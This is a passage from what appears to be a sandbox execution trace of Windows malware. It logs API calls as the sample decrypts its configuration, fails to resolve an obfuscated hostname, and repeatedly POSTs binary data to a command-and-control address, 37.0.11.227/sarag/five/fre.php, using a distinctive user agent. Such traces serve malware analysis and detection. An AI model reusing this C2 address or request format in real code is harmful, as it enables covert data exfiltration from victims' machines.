lpSrch="https://") returned 0x0 [0216.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.717] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.718] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.718] GetProcessHeap () returned 0x690000 [0216.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0216.718] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.718] GetProcessHeap () returned 0x690000 [0216.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0216.719] GetProcessHeap () returned 0x690000 [0216.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.758] GetProcessHeap () returned 0x690000 [0216.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0216.758] GetProcessHeap () returned 0x690000 [0216.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0216.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0216.775] GetProcessHeap () returned 0x690000 [0216.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0216.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.776] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0216.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.777] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.778] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.778] GetProcessHeap () returned 0x690000 [0216.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0216.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.779] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0216.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.780] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0216.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.781] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0216.781] GetProcessHeap () returned 0x690000 [0216.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0216.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0216.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0216.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.786] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0216.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.787] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0216.787] GetProcessHeap () returned 0x690000 [0216.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0216.787] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0216.787] GetProcessHeap () returned 0x690000 [0216.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0216.787] socket (af=2, type=1, protocol=6) returned 0x540 [0216.787] connect (s=0x540, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0216.813] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0216.813] GetProcessHeap () returned 0x690000 [0216.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0216.813] GetProcessHeap () returned 0x690000 [0216.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0216.814] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.814] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.814] GetProcessHeap () returned 0x690000 [0216.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0216.814] GetProcessHeap () returned 0x690000 [0216.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.815] GetProcessHeap () returned 0x690000 [0216.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0216.815] GetProcessHeap () returned 0x690000 [0216.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0216.817] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.818] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.818] GetProcessHeap () returned 0x690000 [0216.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0216.818] GetProcessHeap () returned 0x690000 [0216.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.819] send (s=0x540, buf=0x6ab500*, len=242, flags=0) returned 242 [0216.819] send (s=0x540, buf=0x6aba40*, len=159, flags=0) returned 159 [0216.819] GetProcessHeap () returned 0x690000 [0216.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0216.819] recv (in: s=0x540, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0216.903] GetProcessHeap () returned 0x690000 [0216.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0216.906] GetProcessHeap () returned 0x690000 [0216.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0216.906] GetProcessHeap () returned 0x690000 [0216.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0216.907] GetProcessHeap () returned 0x690000 [0216.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0216.907] closesocket (s=0x540) returned 0 [0216.965] GetProcessHeap () returned 0x690000 [0216.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0216.965] GetProcessHeap () returned 0x690000 [0216.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.966] GetProcessHeap () returned 0x690000 [0216.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0216.966] GetProcessHeap () returned 0x690000 [0216.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0216.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x98c) returned 0x540 [0216.969] Sleep (dwMilliseconds=0xea60) [0216.972] GetProcessHeap () returned 0x690000 [0216.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0216.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.975] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0216.998] GetProcessHeap () returned 0x690000 [0216.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0216.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.999] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0216.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.999] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.000] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.000] GetProcessHeap () returned 0x690000 [0217.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0217.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.002] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0217.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.003] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.008] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0217.008] GetProcessHeap () returned 0x690000 [0217.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.009] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.010] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.011] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.012] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.012] GetProcessHeap () returned 0x690000 [0217.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0217.012] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.012] GetProcessHeap () returned 0x690000 [0217.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0217.013] GetProcessHeap () returned 0x690000 [0217.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.013] GetProcessHeap () returned 0x690000 [0217.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0217.016] GetProcessHeap () returned 0x690000 [0217.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0217.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.016] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.021] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0217.029] GetProcessHeap () returned 0x690000 [0217.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0217.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.030] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0217.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.031] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.032] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.032] GetProcessHeap () returned 0x690000 [0217.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0217.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.034] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0217.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.035] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.038] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0217.038] GetProcessHeap () returned 0x690000 [0217.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.039] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0217.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.040] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0217.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.041] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0217.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.042] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0217.043] GetProcessHeap () returned 0x690000 [0217.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0217.043] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0217.043] GetProcessHeap () returned 0x690000 [0217.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0217.043] socket (af=2, type=1, protocol=6) returned 0x544 [0217.043] connect (s=0x544, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0217.071] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0217.072] GetProcessHeap () returned 0x690000 [0217.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0217.072] GetProcessHeap () returned 0x690000 [0217.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0217.073] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.074] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.074] GetProcessHeap () returned 0x690000 [0217.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0217.074] GetProcessHeap () returned 0x690000 [0217.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.074] GetProcessHeap () returned 0x690000 [0217.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0217.074] GetProcessHeap () returned 0x690000 [0217.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0217.075] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.076] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.076] GetProcessHeap () returned 0x690000 [0217.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0217.076] GetProcessHeap () returned 0x690000 [0217.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.077] send (s=0x544, buf=0x6ab500*, len=242, flags=0) returned 242 [0217.077] send (s=0x544, buf=0x6aba40*, len=159, flags=0) returned 159 [0217.078] GetProcessHeap () returned 0x690000 [0217.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0217.078] recv (in: s=0x544, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0217.155] GetProcessHeap () returned 0x690000 [0217.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0217.155] GetProcessHeap () returned 0x690000 [0217.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0217.156] GetProcessHeap () returned 0x690000 [0217.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0217.158] GetProcessHeap () returned 0x690000 [0217.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0217.159] closesocket (s=0x544) returned 0 [0217.159] GetProcessHeap () returned 0x690000 [0217.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0217.159] GetProcessHeap () returned 0x690000 [0217.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.160] GetProcessHeap () returned 0x690000 [0217.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0217.160] GetProcessHeap () returned 0x690000 [0217.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0217.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc14) returned 0x544 [0217.162] Sleep (dwMilliseconds=0xea60) [0217.178] GetProcessHeap () returned 0x690000 [0217.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0217.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.208] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0217.220] GetProcessHeap () returned 0x690000 [0217.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0217.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.221] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0217.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.222] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.225] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.225] GetProcessHeap () returned 0x690000 [0217.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0217.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.227] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0217.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.228] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.229] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0217.229] GetProcessHeap () returned 0x690000 [0217.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.230] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.231] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.232] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.233] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.233] GetProcessHeap () returned 0x690000 [0217.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0217.233] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.233] GetProcessHeap () returned 0x690000 [0217.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 